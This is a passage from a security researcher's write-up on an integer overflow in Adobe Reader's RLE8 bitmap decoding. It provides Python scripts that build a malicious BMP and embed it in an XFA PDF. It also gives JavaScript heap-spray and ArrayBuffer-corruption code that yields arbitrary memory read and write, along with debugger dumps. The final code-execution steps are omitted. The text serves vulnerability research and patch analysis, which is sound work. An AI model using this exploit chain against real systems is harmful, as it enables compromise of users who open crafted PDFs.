    data += b'\x00\x02\x0C\x00'

    # 0xFFFFFF0C + 0xF4 = 0 (32-bit wrap-around)
    # 0xF4 bytes of 0x10
    data += b'\xF4\x10'

    # mark end of bitmap to skip CxxThrowException
    data += b'\x00\x01'

    return data

def generate_bitmap(filepath):
    data = get_bitmap_data()
    data_size = len(data)

    bmi_header = get_bitmap_info_header(data_size)
    bmi_colors = get_bitmap_info_colors()

    bmf_header_size = 0x0E
    bits_offset = bmf_header_size + len(bmi_header) + len(bmi_colors)
    file_size = bits_offset + data_size
    bmf_header = get_bitmap_file_header(file_size, bits_offset)
    with open(filepath, 'wb') as f:
        f.write(bmf_header)
        f.write(bmi_header)
        f.write(bmi_colors)
        f.write(data)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Usage: %s <output.bmp>' % os.path.basename(sys.argv[0]))
        sys.exit(1)
    generate_bitmap(sys.argv[1])

The script generates an RLE8 bitmap with the following parameters:

width is 0xF0
height is 1
bit count is 8

The heap buffer will therefore be 0xF0 bytes in size, and we can write 0xF4 bytes of value 0x10 backward, that is, into the memory immediately before the buffer.
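The numbers behind this payload can be checked without building the file. The Python sketch below recomputes the final xpos, the signed offset of the first written byte, and the resulting file size; the variable names are invented, and the header and color table sizes are those of the structures described in section 3.1.

```python
MASK32 = 0xFFFFFFFF

full_deltas = 0xFFFFFF00 // 0xFF                 # commands '00 02 FF 00'
xpos = (full_deltas * 0xFF) & MASK32             # 0xFFFFFF00
xpos = (xpos + 0x0C) & MASK32                    # extra delta '00 02 0C 00'
run_length = 0xF4                                # command 'F4 10'

first_write = xpos - (1 << 32)                   # signed offset of the first byte
wrapped_sum = (xpos + run_length) & MASK32       # value compared against width

data_size = full_deltas * 4 + 4 + 2 + 2          # deltas + extra delta + run + end marker
bits_offset = 14 + 40 + 4 * 256                  # two headers + 256-entry color table
file_size = bits_offset + data_size

print(hex(xpos), first_write, wrapped_sum, file_size)
```

The wrapped sum of 0 is what lets the run pass the width check, and the run then covers offsets -0xF4 through -1 relative to the start of the scan line.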

5.4 PDF Construct

This section explains how to embed the generated BMP image into a PDF file. The following PDF template will be used later.

%PDF-1.7
1 0 obj
<<
    /Type /Catalog
    /AcroForm 5 0 R
    /Pages 2 0 R
    /NeedsRendering true
    /Extensions
    <<
        /ADBE
        <<
            /ExtensionLevel 3
            /BaseVersion /1.7
        >>
    >>
>>
endobj
2 0 obj
<<
    /Type /Pages
    /Kids [3 0 R]
    /Count 1
>>
endobj
3 0 obj
<<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    /Resources
    <<
        /Font
        <<
            /F1
            <<
                /BaseFont /Helvetica
                /Subtype /Type1
                /Name /F1
            >>
        >>
    >>
>>
endobj
4 0 obj
<<
    /Length 104
>>
stream
BT
/F1 12 Tf
90 692 Td
(If you see this page, it means that your PDF reader does not support XFA.) Tj
ET
endstream
endobj
5 0 obj
<<
    /XFA 6 0 R
>>
endobj
6 0 obj
<<
    /Filter /FlateDecode
    /Length __STREAM_LENGTH__
>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
    <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
        <pageArea name="Page1" id="Page1">
          <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
          <medium stock="default" short="612pt" long="792pt"/>
        </pageArea>
      </pageSet>
      <subform w="576pt" h="756pt">
        <field name="ImageCrash">
          <ui>
            <imageEdit/>
          </ui>
          <value>
            <image aspect="actual" contentType="image/bmp">
__IMAGE_BASE64_DATA__
            </image>
          </value>
        </field>
      </subform>
      <event activity="initialize" name="event__initialize">
        <script contentType="application/x-javascript">
// The JavaScript code will be executed before triggering the vulnerability
        </script>
      </event>
      <event activity="docReady" ref="$host" name="event__docReady">
        <script contentType="application/x-javascript">
// The JavaScript code will be executed after triggering the vulnerability
        </script>
      </event>
    </subform>
  </template>
  <config xmlns="http://www.xfa.org/schema/xci/3.0/">
    <agent name="designer">
      <!--  [0..n]  -->
      <destination>pdf</destination>
      <pdf>
        <!--  [0..n]  -->
        <fontInfo/>
      </pdf>
    </agent>
    <present>
      <!--  [0..n]  -->
      <pdf>
        <!--  [0..n]  -->
        <version>1.7</version>
        <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
        <packets>*</packets>
      </xdp>
    </present>
  </config>
  <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
    <xfa:data xfa:dataNode="dataGroup"/>
  </xfa:datasets>
  <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
    <annots/>
  </xfdf>
</xdp:xdp>
endstream
endobj
xref
0 7
0000000000 65535 f 
0000000009 00000 n 
0000000237 00000 n 
0000000306 00000 n 
0000000587 00000 n 
0000000746 00000 n 
0000000782 00000 n 
trailer
<<
    /Root 1 0 R
    /Size 7
>>
startxref
__XREF_OFFSET__
%%EOF

The generated BMP file is larger than 60MB. It is base64-encoded and embedded in 6 0 obj of the PDF file. To reduce the file size, this object is compressed with zlib/deflate.

To exploit the vulnerability, we need to run JavaScript code both before and after the vulnerability is triggered. This can be done by putting the code in the initialize event and the docReady event, respectively.

The following Python code can be used to generate the PDF file.
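Compression is very effective here because the bitmap data consists almost entirely of one repeated delta command. The Python sketch below demonstrates this on a scaled-down stand-in for the real data; the sample size is arbitrary and chosen only to keep the example fast.

```python
import base64
import zlib

# Scaled-down stand-in for the bitmap data: the same 4-byte delta command repeated.
sample = b'\x00\x02\xFF\x00' * 30000
encoded = base64.b64encode(sample)     # what gets embedded in the XFA <image> element
compressed = zlib.compress(encoded)    # what the FlateDecode stream stores

print(len(sample), len(encoded), len(compressed))
assert zlib.decompress(compressed) == encoded
```

Base64 turns every 12 input bytes into 16 output characters, so the repeated 4-byte command still produces a short repeating pattern that deflate handles well.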

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import zlib
import base64

def parse_template(template_path):
    # Split the template into the bytes before, inside, and after the XDP packet.
    with open(template_path, 'rb') as f:
        data = f.read()
    xdp_begin = data.find(b'<xdp:xdp')
    xdp_end = data.find(b'</xdp:xdp>') + len(b'</xdp:xdp>')

    part1 = data[:xdp_begin]
    part2 = data[xdp_begin:xdp_end]
    part3 = data[xdp_end:]
    return part1, part2, part3

def generate_pdf(image_path, template_path, pdf_path):
    pdf_part1, pdf_part2, pdf_part3 = parse_template(template_path)

    # Embed the base64-encoded BMP, then deflate the whole XDP stream.
    with open(image_path, 'rb') as f:
        image_data = base64.b64encode(f.read())
    pdf_part2 = pdf_part2.replace(b'__IMAGE_BASE64_DATA__', image_data)
    pdf_part2 = zlib.compress(pdf_part2)

    pdf_part1 = pdf_part1.replace(b'__STREAM_LENGTH__', b'%d' % len(pdf_part2))

    pdf_data = pdf_part1 + pdf_part2 + pdf_part3
    # Search only after the compressed stream, whose bytes could contain 'xref' by chance.
    xref_offset = pdf_data.find(b'xref', len(pdf_part1) + len(pdf_part2))
    pdf_data = pdf_data.replace(b'__XREF_OFFSET__', b'%d' % xref_offset)

    with open(pdf_path, 'wb') as f:
        f.write(pdf_data)

if __name__ == '__main__':
    if len(sys.argv) != 4:
        filename = os.path.basename(sys.argv[0])
        print('Usage: %s <input.bmp> <template.pdf> <output.pdf>' % filename)
        sys.exit(1)
    generate_pdf(sys.argv[1], sys.argv[2], sys.argv[3])

5.5 Exploit Tricks

5.5.1 Memory Layout (1)

In this case, ArrayBuffer is more suitable for exploiting the vulnerability.

First, we create lots of ArrayBuffer objects with byteLength set to 0xE0, and then free one ArrayBuffer object of every pair to create holes.

┌─────────────┬─────────────┬─────────────┬─────────────┐
│ ArrayBuffer │     Hole    │ ArrayBuffer │     Hole    │
└─────────────┴─────────────┴─────────────┴─────────────┘
│ <-  0xF0 -> │
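
A minimal sketch of this spray-and-free step is shown below. The function name `makeHoles` and the `count` parameter are illustrative and do not come from the original exploit. The 0xE0 bytes of data plus the 0x10-byte ObjectElements header give the 0xF0 block size shown in the diagram. Dropping a reference only makes the buffer eligible for collection; how and when the engine actually frees it is an assumption here and is not shown.

```javascript
// Hypothetical helper: spray ArrayBuffers and release every second one.
function makeHoles(count) {
    var array = new Array(count);
    for (var i = 0; i < count; ++i) {
        array[i] = new ArrayBuffer(0xE0);
    }
    // Drop one buffer of every pair so the freed blocks can become holes
    // once the garbage collector reclaims them (GC timing is an assumption).
    for (var j = 1; j < count; j += 2) {
        array[j] = null;
    }
    return array;
}
```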

Then we trigger the vulnerability, and the heap buffer of the bitmap will be placed in one of the holes.

┌─────────────┬─────────────┬─────────────┬─────────────┐
│ ArrayBuffer │ Bitmap Data │ ArrayBuffer │     Hole    │
└─────────────┴─────────────┴─────────────┴─────────────┘

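Since we are able to write 0xF4 bytes backward with the value 0x10, the backing store of the preceding ArrayBuffer will be filled with 0x10, along with the last 0x0C bytes of its header (which include byteLength) and the 8-byte heap metadata of the bitmap buffer.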

0:014> dd 304c8398
;            -, byteLength, viewobj,       -,
304c8398  00000000 10101010 10101010 10101010
;         ArrayBuffer data
304c83a8  10101010 10101010 10101010 10101010
304c83b8  10101010 10101010 10101010 10101010
304c83c8  10101010 10101010 10101010 10101010
304c83d8  10101010 10101010 10101010 10101010
304c83e8  10101010 10101010 10101010 10101010
304c83f8  10101010 10101010 10101010 10101010
304c8408  10101010 10101010 10101010 10101010
304c8418  10101010 10101010 10101010 10101010
304c8428  10101010 10101010 10101010 10101010
304c8438  10101010 10101010 10101010 10101010
304c8448  10101010 10101010 10101010 10101010
304c8458  10101010 10101010 10101010 10101010
304c8468  10101010 10101010 10101010 10101010
304c8478  10101010 10101010 10101010 10101010 ; end of ArrayBuffer
; metadata of next heap buffer (bitmap data)
304c8488  10101010 10101010
; bitmap data begins here
304c8490                    00000000 00000000

Now the byteLength of the ArrayBuffer object has been changed to 0x10101010, so out-of-bounds access is possible. So far so good? Not quite: the process will crash immediately because we also overwrote the DataView pointer.

5.5.2 Memory Layout (0)

We can avoid the crash if we make 0x10101010 act like a valid pointer. Obviously, the memory layout has to be arranged before triggering the vulnerability. To make it more stable, this should be done even before we create and free the ArrayBuffer objects.

We need the ability to put any value at a chosen memory address, such as 0x10101010. To achieve this goal, we can create lots of ArrayBuffer objects with byteLength set to 0xFFE8. That's a carefully selected size which makes sure that the ArrayBuffer objects will be allocated at predictable addresses.

// 0xFFE8 -> byteLength
// 0x10 -> sizeof ObjectElements
// 0x08 -> sizeof heap block's metadata
0xFFE8 + 0x10 + 0x08 = 0x10000

I’m not going to discuss in detail how to avoid the crash; it’s very easy to figure out the specific conditions. The following code can be used to avoid the crash.

function fillHeap() {
    var array = new Array(0x1200);
    array[0] = new ArrayBuffer(0xFFE8);
    var dv = new DataView(array[0]);

    dv.setUint32(0xFB8, 0x10100058, true);
    dv.setUint32(0, 0x10100158, true);
    dv.setUint32(0xFFA8, 0x10100258, true);
    dv.setUint32(0x200 + 0x14, 0x10100358, true);

    for (var i = 1; i < array.length; ++i) {
        array[i] = array[0].slice();
    }
    return array;
}

It’s not done yet. The process still crashes when we try to create a new DataView object for the corrupted ArrayBuffer. We can avoid this crash using the same trick. The following is the improved code.

function fillHeap() {
    var array = new Array(0x1200);
    array[0] = new ArrayBuffer(0xFFE8);
    var dv = new DataView(array[0]);
    // avoid crash when triggering the vulnerability
    dv.setUint32(0xFB8, 0x10100058, true);
    dv.setUint32(0, 0x10100158, true);
    dv.setUint32(0xFFA8, 0x10100258, true);
    dv.setUint32(0x200 + 0x14, 0x10100358, true);
    // avoid crash when creating new DataView objects
    dv.setUint32(0xFFA4, 0x10100458, true);

    for (var i = 1; i < array.length; ++i) {
        array[i] = array[0].slice();
    }
    return array;
}
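
The offsets passed to setUint32 can be related to absolute addresses with a little arithmetic. The sketch below is an illustration and not part of the original exploit: the helper name `offsetForAddress` is hypothetical, and it assumes that the data of each sprayed ArrayBuffer starts 0x58 bytes past a 0x10000-aligned address, which is what the dump at 30080000 in section 5.5.4 suggests.

```javascript
// Assumption: the data of each sprayed ArrayBuffer starts at
// (0x10000-aligned address) + 0x58, as the dump in 5.5.4 suggests.
var DATA_START = 0x58;

// Map an absolute address to the offset inside a sprayed buffer that would
// land on that address, given the layout assumed above.
function offsetForAddress(address) {
    return ((address & 0xFFFF) - DATA_START) & 0xFFFF;
}
```

Under this assumption, `offsetForAddress(0x10101010)` gives 0xFB8 and `offsetForAddress(0x10100258 + 0x14)` gives 0x214, which match the first and fourth setUint32 calls in fillHeap.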

5.5.3 Global Read / Write

Once we have overwritten the byteLength of any ArrayBuffer object with 0x10101010, we can leverage this ArrayBuffer object to overwrite the next one’s byteLength with 0xFFFFFFFF. It’s very easy to find the next ArrayBuffer object if we put a flag value within all the ArrayBuffer objects.

  (1)byteLength            (3)Global Access
 ┌─<───<───<───┐            <──────┬──────>
┌┼────────────┬┼────────────┬──────┼──────┬─────────────┐
│ ArrayBuffer │ Bitmap Data │ ArrayBuffer │     Hole    │
└──────┼──────┴─────────────┴┼────────────┴─────────────┘
       └──>───>───>───>────>─┘
        (2) byteLength to -1

Now we have the ability to read and write any memory address within the user space.
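
The search for the next ArrayBuffer could be sketched as follows. This is an illustration rather than the original exploit code: `FLAG`, `findNextBuffer`, and `expandNext` are hypothetical names, the flag is assumed to sit in the first dword of every sprayed buffer, and the byteLength field is assumed to sit 0x0C bytes before the data, as in the dump in 5.5.1.

```javascript
// Hypothetical marker written at offset 0 of every sprayed buffer.
var FLAG = 0x13371337;

// Scan forward through the out-of-bounds view for the next buffer's marker.
// `dv` is a DataView over the corrupted ArrayBuffer; `start` is 4-byte aligned.
function findNextBuffer(dv, start) {
    for (var off = start; off + 4 <= dv.byteLength; off += 4) {
        if (dv.getUint32(off, true) === FLAG) {
            return off;  // offset of the next buffer's data
        }
    }
    return -1;
}

// Overwrite the neighbour's byteLength (assumed at data - 0x0C) with 0xFFFFFFFF.
function expandNext(dv, start) {
    var dataOff = findNextBuffer(dv, start);
    if (dataOff < 0x0C) {
        return false;  // marker not found, or no room for a header before it
    }
    dv.setUint32(dataOff - 0x0C, 0xFFFFFFFF, true);
    return true;
}
```

Starting the scan at offset 4 skips the marker of the corrupted buffer itself.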

5.5.4 Absolute Address Access

Once we have the global access ability, we can search backward to calculate the base address of the ArrayBuffer object’s backing store, and thus read and write at any given absolute memory address.

We can search for either of two flags, ffeeffee or f0e0d0c0, to calculate the base address. To make it more accurate, the bytes around the flag value also need to be verified.

0:014> dd 30080000
30080000  16b80e9e 0101331b ffeeffee 00000002  ; ffeeffee
30080010  055a00a4 2f0b0010 055a0000 30080000  ; +0x14 -> 30080000
30080020  00000fcf 30080040 3104f000 000002e5
30080030  00000001 00000000 30d69ff0 30d69ff0
30080040  3eb82e96 08013313 00000000 0000ffe8
30080050  00000000 00000000 10100158 00000000
30080060  00000000 00000000 00000000 00000000
30080070  00000000 00000000 00000000 00000000

0:014> dd 305f4000
305f4000  00000000 00000000 6ab08d69 0858b71a
305f4010  0bbab388 30330080 0ff00112 f0e0d0c0  ; f0e0d0c0
305f4020  15dc2c3f 00000430 305f402c d13bc929  ; +0x0C -> 305f402c
305f4030  e5c521a7 d9b264d4 919cee58 45da954e
305f4040  5c3f608b 2b5fd340 0bae3aa9 2b5fd340
305f4050  0fae32aa d13bc929 e5c521a7 d9b264d4
305f4060  919cee58 45da954e 9c3f608b f952aa94
305f4070  989c772a a1dd934a ac5b154b 2fadd038
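
The backward search for the ffeeffee flag might look like the sketch below. It is an illustration under stated assumptions: `read32` stands for a hypothetical primitive that returns the unsigned dword at a (possibly negative) offset relative to the start of the corrupted buffer's data, the only verification performed is the self-pointer at flag + 0x14 seen in the first dump, and the check that the segment base is 0x10000-aligned is an assumption drawn from that same dump.

```javascript
// Hypothetical: read32(rel) returns the unsigned dword at (data start + rel).
// Returns the absolute address of the data start, or -1 if no flag is found.
function findDataBase(read32, maxBack) {
    for (var rel = -4; rel >= -maxBack; rel -= 4) {
        if (read32(rel) !== 0xFFEEFFEE) {
            continue;
        }
        // In the dump, the dword at flag + 0x14 holds the segment base,
        // and the flag itself sits at segment base + 8.
        var segment = read32(rel + 0x14);
        if ((segment & 0xFFFF) !== 0) {
            continue;  // assumed alignment check failed; keep searching
        }
        return segment + 8 - rel;
    }
    return -1;
}
```

With the values from the first dump, the flag is found 0x50 bytes before the data and the result is 0x30080058, the address where the dword 10100158 written by fillHeap appears.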

5.5.5 Remaining Steps

Once we can read and write at any given absolute memory address, it’s very easy to achieve code execution. The following are the remaining steps, which will not be discussed in this post:

EIP hijack
ASLR bypass
DEP bypass
CFG bypass

0x06. CVE-2013-2729

Three integer overflows were found within the handling of RLE compressed data, one in RLE8 decompression and the other two in RLE4 decompression.

Why didn’t we find four? Because the other one was patched six years ago. You can read feliam’s write-up for CVE-2013-2729 if you haven’t read it yet.

Also, the patch for CVE-2013-2729 can be found within the handling of RLE8 compressed data.

dst_xpos = BYTE1(cmd) + xpos;
if ( ypos >= height || dst_xpos < xpos || 
     dst_xpos < BYTE1(cmd) || dst_xpos > width )  // overflow check
  goto LABEL_170;         // CxxThrowException
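
The effect of this check can be reproduced with 32-bit unsigned arithmetic. The sketch below is a model of the decompiled condition, not Adobe's code: the function name `rle8RunAllowed` is hypothetical, `count` stands for BYTE1(cmd), all values are assumed to be unsigned 32-bit integers, and `>>> 0` emulates the wraparound of a 32-bit unsigned addition.

```javascript
// Model of the patched RLE8 check; returns false where the
// decompiled code jumps to LABEL_170 (CxxThrowException).
function rle8RunAllowed(xpos, ypos, count, width, height) {
    var dstXpos = (count + xpos) >>> 0;  // 32-bit unsigned wraparound
    if (ypos >= height || dstXpos < xpos ||
        dstXpos < count || dstXpos > width) {
        return false;
    }
    return true;
}
```

For example, with xpos equal to 0xFFFFFFFF and a count of 2, the sum wraps to 1, which is smaller than xpos, so the run is rejected.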

It’s astonishing that Adobe only patched the case that was reported and ignored the other three.

0x07. Lessons Learned

For product developers, please try to understand the root cause of the vulnerability and eliminate similar ones as much as you can.

For security researchers, patch analysis is a good way to figure out what the developers were thinking, and maybe you can find bypass solutions (this happens sometimes).